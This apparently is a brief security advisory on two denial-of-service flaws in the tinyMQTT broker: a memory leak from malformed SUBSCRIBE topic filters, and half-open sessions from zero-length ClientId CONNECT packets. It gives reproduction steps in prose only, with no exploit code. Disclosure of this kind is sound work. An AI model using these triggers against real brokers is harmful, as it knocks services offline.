tinyMQTT Memory Leak and Resource Exhaustion Vulnerabilities

A memory leak vulnerability has been identified in tinyMQTT version commit 6226ade, released on February 18, 2024. The issue arises because the MQTT broker does not properly validate UTF-8 strings in topic filters, allowing attackers to send malformed subscription requests with large or invalid payloads. This lack of validation leads to unbounded memory allocation for each malformed filter, causing a memory leak and potential denial-of-service under sustained attack. Additionally, the broker fails to close client connections after sending a CONNACK with return code 0x02 (Identifier Rejected) when a zero-length ClientId and CleanSession=0 are used. This oversight allows attackers to open numerous half-open sessions, exhausting server resources and causing the broker to become unresponsive or crash.

Impact

Exploitation of these vulnerabilities leads to a memory leak and resource exhaustion, causing the MQTT broker to become unresponsive or crash.

Reproduction

The memory leak can be reproduced by sending repeated SUBSCRIBE packets with malformed topic filters, which the broker will accept without validation, causing memory to be allocated and not freed. The resource exhaustion vulnerability can be reproduced by sending CONNECT packets with a zero-length ClientId and CleanSession=0, which the broker incorrectly handles by not closing the connection, leaving it open and consuming server resources.